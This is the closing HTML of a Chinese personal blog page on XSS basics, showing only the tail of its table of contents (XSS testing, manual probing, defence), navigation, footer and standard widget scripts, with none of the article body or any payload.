class="toc-text">5 XSS 测试与发现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#5-1-%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7"><span class="toc-number">5.1.</span> <span class="toc-text">5.1 自动化工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-2-%E6%89%8B%E5%8A%A8%E6%8E%A2%E6%B5%8B"><span class="toc-number">5.2.</span> <span class="toc-text">5.2 手动探测</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-XSS-%E9%98%B2%E5%BE%A1"><span class="toc-number">6.</span> <span class="toc-text">6 XSS 防御</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://by-musi.github.io/2023/12/20/XSS%E5%9F%BA%E7%A1%80%E4%BB%8B%E7%BB%8D/&title=XSS基础介绍"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023
    CaiShao
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
      <ul>
        
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider"> | </span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'BY-musi/BY-musi.github.io';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'comment';
      var utterances_theme = 'photon-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>


<!-- FancyBox -->

  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>
  <script>
    Fancybox.bind('[data-fancybox="gallery"]', {
      //
    });    
  </script>


<!-- Copyright -->

  <!-- JS库 clipboard 拷贝内容到粘贴板-->
  <script src="https://cdn.bootcss.com/clipboard.js/2.0.1/clipboard.min.js"></script>

  <!-- JS库 sweetalert 显示提示信息-->
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>

  <script>
    var clipboard = new ClipboardJS(".fa-clipboard");
    clipboard.on("success", function(target) {
      var message = document.createElement("div");
      message.innerHTML =
        '<i class="fa fa-check-circle message-icon"></i><span class="message-content">' +
        target.trigger.getAttribute("aria-label") +
        "</span>";
      swal({
        content: message,
        className: "copy-success-message",
        timer: 1000,
        button: false
      });
    });
  </script>  

</body>
</html>
